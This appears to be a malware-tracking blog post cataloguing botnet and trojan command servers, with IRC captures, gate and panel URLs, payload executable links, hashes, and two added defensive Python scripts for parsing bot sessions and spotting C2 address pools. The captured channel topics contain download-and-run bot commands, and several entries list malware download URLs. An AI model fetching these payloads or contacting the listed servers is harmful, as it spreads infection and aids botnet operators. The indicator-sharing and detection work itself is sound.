217.160.253.201 (IRC botnet hosted in Germany, 1&1 Internet AG)

Remote Host: 217.160.253.201  Port Number: 2345
NICK New[USA|00|P|78527]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-2736 * 0 :COMPUTERNAME
MODE New[USA|00|P|78527] -ix
JOIN #!loco!
PONG 22
MOTD
Now talking in #!loco!
Topic On: [ #!loco! ] [ .m.s|.m.e foto haaaha http://goo.gl/SgJrv?= ]
Topic By: [ wd69 ]

micolosoft.in (Trojan-Ransom.Winlock hosted in United States, Scranton Network Operations Center Inc)

Traffic – by DNS:
micolosoft.in 184.22.188.84
poletaem002.in 199.168.139.53
mekrosoft.in 184.22.188.84
Traffic – by TCP/IP Connections:
184.22.188.84 80
199.168.139.53 80
Traffic – by URL:
micolosoft.in/zip/gate.php?user=partner_011&uid={B31F86E0-234C-11E1-BBF6-806D6172696F}&os=2
poletaem002.in/image/gate.php?getcmd=1&uid=XANNY
Here it demands a user and password; have fun finding them. This is what you get if you are infected with:
hosting infos: http://whois.domaintools.com/184.22.188.84

n39rfiuewh9uihc.org (Bredolab hosted in Russian Federation, St. Petersburg, Petersburg Internet Network Ltd)

Registry Change
The following Registry Keys were changed:
Changed [NTUSER/Software/Microsoft/Internet Explorer/Main/Default Feeds]
Changed [NTUSER/Software/Microsoft/Internet Explorer/PhishingFilter]
Changed [NTUSER/Software/Microsoft/Internet Explorer/Recovery]
Traffic – by DNS:
n39rfiuewh9uihc.org 146.185.242.131
Traffic – by TCP/IP Connections:
146.185.242.131 80
Traffic – by URL:
n39rfiuewh9uihc.org/G0X7Z3vtzdpVPR4sBFa95jxTSQYAD82f.tiff
n39rfiuewh9uihc.org/tBKNvbQpVYCDRSGmck4nxAaWhX.bmp
xandora results here: http://www.xandora.net/xangui/malware/view/692cfa2313899607124752a9f8d88b6d
hosting infos: http://whois.domaintools.com/146.185.242.131

freetop.mobi (Umbra Loader hosted in United States, Fredericksburg, Singlehop Inc)

Umbra Loader Panel: http://www.freetop.mobi/en/panel/Panel/
Vertexnet Loader Panel: http://mymobilewap.info/utube/bot/
Traffic – by DNS:
mymobilewap.info 69.175.127.82
www.freetop.mobi 69.175.127.82
Traffic – by TCP/IP Connections:
69.175.127.82 80
Traffic – by URL:
mymobilewap.info/utube/stel.exe
mymobilewap.info/utube/server.exe
www.freetop.mobi/en/panel/Panel/bot.php
You can find more executables here: mymobilewap.info/utube/
Analysis results: http://www.xandora.net/xangui/malware/view/b455957506ffa7202211e7c74ecdd7bb
hosting infos: http://whois.domaintools.com/69.175.127.82

6e166d1c1.com (Trojan.Win32.Jorik.Lethic.gb hosted in Canada, Affilnet Corporation)

File Details
MD5: 55c55f7764767fd46909b95b1e64b2d1
SHA-1: 964d2183f263be8bc565d3dd307486614e5d6ce1
File Type: exe
First Received (GMT+8): 2012-02-18 06:49:00
Size (bytes): 8704
Weightage: 147
virustotal.com: 29 vendors detected
Static File Header
++++++++++++++++++++++++ FILE HEADER INFORMATION +++++++++++++++++++++++++
TimeStamp: 4F1DB86E Tue Jan 24 03:43:42 2012
Subsystem: 2 (Windows GUI)
Image Base: 00400000 Size: 00006000
Code Base: 00001000 Size: 00001600
Data Base: 00003000

foxbid.net (IRC botnet hosted in Thailand, Bangkok, Cat Telecom Data Comm. Dept IDC Office)

Remote Host: 122.155.18.83  Port Number: 2345
NICK New[USA|00|P|79102]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-4584 * 0 :COMPUTERNAME
MODE New[USA|00|P|79102] -ix
JOIN #!loco!
PONG 22
MOTD
Now talking in #!loco!
Topic On: [ #!loco! ] [ .m.s|.m.e haha foto 😛 http://goo.gl/W2EOO?= ]
Topic By: [ wd44

webingenial.com (ngrBot hosted in Ukraine, Tehnologii Budushego LLC)

Resolved: [webingenial.com] To [178.86.30.169] port 1865
Resolved: [webingenial.com] To [213.155.7.39] port 1865
Remote Host / Port Number:
178.86.30.169 1865 PASS ngrBot
213.155.7.39 1865 PASS ngrBot
NICK n{US|XPa}rwslldg
USER rwslldg 0 0 :rwslldg
Now talking in #main
Topic On: [ #main ] [ .m on .up http://www.creatucurso.net/ups.exe 5A551736BBC5CA8245CAB24FA0DD18BC -r ]
Topic By: [ fckoffoOo ]

jer0001.in (ngrBot hosted in United States, Razor Inc)

Very big botnet; I have already posted different domain names from this net here.
Resolved: [jer0001.in] To [208.83.233.194] port 1889
Resolved: [jer0001.in] To [208.83.232.90] port 1889
Resolved: [jer0001.in] To [208.83.234.66] port 1889
HTTP Conversations:
199.15.234.7:80 – [api.wipmania.com] Request: GET / Response: 200 “OK”
199.7.177.218:80 – [hotfile.com] Request: GET /dl/146860590/6c4cc0b/sgfdfa.exe Response: 302 “Found”
74.120.11.30:80 –
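The IRC sessions captured in the entries above (the #!loco! bot beaconing with a New[USA|00|P|NNNNN] nick and reading its job from the channel topic, and ngrBot authenticating with PASS ngrBot and getting ".up <url> <hash>" from the topic of #main) are easy to pull apart with a small protocol parser. The following Python is an added example written for this page, not code from the sandbox, the blog, or the bots' authors. The two sample sessions are constructed from the captured commands, rendered as raw IRC lines with the topic delivered as the 332 (RPL_TOPIC) numeric a server sends on join; the family labels, the nick regexes and the reading of the 32-hex token as a payload MD5 are this example's own assumptions, not published signatures.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample sessions, rebuilt as raw IRC lines from the commands
# captured on this page. The topic is rendered as the 332 (RPL_TOPIC)
# numeric, which is how a client normally learns a channel topic on join.
LOCO_SESSION = """\
NICK New[USA|00|P|78527]
USER XP-2736 * 0 :COMPUTERNAME
MODE New[USA|00|P|78527] -ix
JOIN #!loco!
PONG 22
:irc.example 332 New[USA|00|P|78527] #!loco! :.m.s|.m.e foto haaaha http://goo.gl/SgJrv?=
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
"""

NGRBOT_SESSION = """\
PASS ngrBot
NICK n{US|XPa}rwslldg
USER rwslldg 0 0 :rwslldg
JOIN #main
:irc.example 332 n{US|XPa}rwslldg #main :.m on .up http://www.creatucurso.net/ups.exe 5A551736BBC5CA8245CAB24FA0DD18BC -r
"""

# Nick formats as seen on this page; these regexes are this example's own
# assumption about the format, not published detection signatures.
LOCO_NICK = re.compile(r"^New\[[A-Z]{2,3}\|\d{2}\|[A-Z]\|\d+\]$")
NGRBOT_NICK = re.compile(r"^n\{[A-Z]{2}\|[A-Za-z0-9]+\}[a-z]{5,}$")
URL_RE = re.compile(r"https?://\S+")
MD5_RE = re.compile(r"\b[0-9A-Fa-f]{32}\b")


@dataclass
class Session:
    password: Optional[str] = None
    nick: Optional[str] = None
    channels: List[str] = field(default_factory=list)
    topics: Dict[str, str] = field(default_factory=dict)
    privmsgs: List[str] = field(default_factory=list)


def parse_line(line: str):
    """Split one IRC line into (prefix, COMMAND, params), honouring the
    optional leading ':prefix' and the ' :trailing' parameter."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return prefix, params[0].upper(), params[1:]


def parse_session(text: str) -> Session:
    """Replay a client-side capture and keep the handshake state a detector needs."""
    s = Session()
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        _, cmd, args = parse_line(raw)
        if cmd == "PASS" and args:
            s.password = args[0]
        elif cmd == "NICK" and args:
            s.nick = args[0]
        elif cmd == "JOIN" and args:
            s.channels += [c for c in args[0].split(",") if c not in s.channels]
        elif cmd == "332" and len(args) >= 3:      # RPL_TOPIC: <nick> <chan> :<topic>
            s.topics[args[1]] = args[2]
        elif cmd == "TOPIC" and len(args) >= 2:    # TOPIC <chan> :<topic>
            s.topics[args[0]] = args[1]
        elif cmd == "PRIVMSG" and len(args) >= 2:
            s.privmsgs.append(args[1])
    return s


def classify(s: Session) -> str:
    """Family label from the handshake. 'irc-bot-loco' is a label chosen
    here for the #!loco! bot, which the page does not name."""
    if s.password == "ngrBot" or (s.nick and NGRBOT_NICK.match(s.nick)):
        return "ngrBot"
    if s.nick and LOCO_NICK.match(s.nick) and "#!loco!" in s.channels:
        return "irc-bot-loco"
    return "unknown"


def topic_iocs(topic: str) -> Dict[str, List[str]]:
    """Pull dot-prefixed bot commands, URLs and 32-hex tokens out of a topic.
    The hex token is assumed to be an MD5 of the payload, as in the ngrBot
    '.up <url> <md5>' topic above; that reading is an assumption."""
    return {
        "commands": [t for t in topic.split() if t.startswith(".")],
        "urls": URL_RE.findall(topic),
        "md5": [h.lower() for h in MD5_RE.findall(topic)],
    }


def analyze(text: str) -> dict:
    s = parse_session(text)
    return {
        "family": classify(s),
        "nick": s.nick,
        "channels": s.channels,
        "iocs": {chan: topic_iocs(t) for chan, t in s.topics.items()},
    }


if __name__ == "__main__":
    for name, sess in (("loco", LOCO_SESSION), ("ngrBot", NGRBOT_SESSION)):
        print(name, analyze(sess))
```

Run against a real capture, the same parser fed with the client-to-server lines from a pcap gives you the C2 channel, the nick template (which encodes country, OS and a counter, so it is a handy way to size the botnet from a few samples) and the download URL and hash the bots are currently being told to fetch.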

zaber.zaberhmar.com (Malware hosted in Netherlands, Amsterdam, Worldstream)

Resolved: [zaber.zaberhmar.com] To [109.236.86.227]
Resolved: [zaber.zaberhmar.com] To [80.79.115.30]
Resolved: [zaber.zaberhmar.com] To [109.236.80.114]
Resolved: [zaber.zaberhmar.com] To [217.23.9.116]
Resolved: [zaber.zaberhmar.com] To [94.102.56.158]
Resolved: [zaber.zaberhmar.com] To [50.7.241.242]
Resolved: [zaber.zaberhmar.com] To [80.82.64.69]
Resolved: [zaber.zaberhmar.com] To [217.23.1.100]
Resolved: [zaber.zaberhmar.com] To [217.23.7.147]
TCP Connection Attempts:
109.236.80.114:8800
80.79.115.30:8800
109.236.86.227:8800
217.23.9.116:8800
94.102.56.158:8800
50.7.241.242:8800
Malware
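What stands out in the zaber.zaberhmar.com entry is not any single address but the spread: nine addresses in six different /16 blocks behind one hostname, with every connection attempt going to the same port 8800. That pattern is worth turning into a triage check over resolver or sandbox logs. The following Python is an added example for this page, not code from the original post: the resolution and connection lists are constructed from the entry above, the www.control.example host on 192.0.2.0/24 (TEST-NET) is a made-up control standing in for an ordinary two-server web site, and the thresholds are this example's own choice.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed sample: the zaber.zaberhmar.com resolutions and connection
# attempts quoted on this page, plus a made-up control host on TEST-NET.
RESOLUTIONS: List[Tuple[str, str]] = [
    ("zaber.zaberhmar.com", "109.236.86.227"),
    ("zaber.zaberhmar.com", "80.79.115.30"),
    ("zaber.zaberhmar.com", "109.236.80.114"),
    ("zaber.zaberhmar.com", "217.23.9.116"),
    ("zaber.zaberhmar.com", "94.102.56.158"),
    ("zaber.zaberhmar.com", "50.7.241.242"),
    ("zaber.zaberhmar.com", "80.82.64.69"),
    ("zaber.zaberhmar.com", "217.23.1.100"),
    ("zaber.zaberhmar.com", "217.23.7.147"),
    ("www.control.example", "192.0.2.10"),   # constructed control
    ("www.control.example", "192.0.2.11"),   # constructed control
]

CONNECTIONS: List[Tuple[str, int]] = [
    ("109.236.80.114", 8800), ("80.79.115.30", 8800), ("109.236.86.227", 8800),
    ("217.23.9.116", 8800), ("94.102.56.158", 8800), ("50.7.241.242", 8800),
    ("192.0.2.10", 443),                      # constructed control
]


def profile(records: List[Tuple[str, str]]) -> Dict[str, Dict[str, int]]:
    """Per hostname: how many distinct addresses it resolved to and how
    widely they are spread across /16 and /8 prefixes."""
    by_host = defaultdict(set)
    for host, ip in records:
        by_host[host].add(ipaddress.ip_address(ip))
    out = {}
    for host, ips in by_host.items():
        n16 = {ipaddress.ip_network(f"{ip}/16", strict=False) for ip in ips}
        n8 = {ipaddress.ip_network(f"{ip}/8", strict=False) for ip in ips}
        out[host] = {"ips": len(ips), "prefixes16": len(n16), "prefixes8": len(n8)}
    return out


def suspicious(records: List[Tuple[str, str]],
               min_ips: int = 5, min_prefixes16: int = 3) -> List[str]:
    """Hostnames whose address set looks like a rotating C2 pool spread over
    unrelated networks rather than one hosting block. Thresholds are this
    example's choice; a hit is a triage lead, not a verdict, since large CDNs
    can produce a similar spread."""
    return sorted(h for h, p in profile(records).items()
                  if p["ips"] >= min_ips and p["prefixes16"] >= min_prefixes16)


def ports_for(host: str, records: List[Tuple[str, str]],
              connections: List[Tuple[str, int]]) -> Set[int]:
    """Ports the sample actually contacted on the addresses a hostname
    resolved to. One odd port reused across many unrelated networks is the
    C2 port to alert on, independent of which address is live today."""
    ips = {ip for h, ip in records if h == host}
    return {port for ip, port in connections if ip in ips}


if __name__ == "__main__":
    for host, p in profile(RESOLUTIONS).items():
        print(host, p, sorted(ports_for(host, RESOLUTIONS, CONNECTIONS)))
    print("suspicious:", suspicious(RESOLUTIONS))
```

The /16 count is a cheap stand-in for "different networks"; with ASN data (from a whois or BGP lookup, as the domaintools links in these entries give you by hand) you would count distinct ASNs instead and the signal gets sharper.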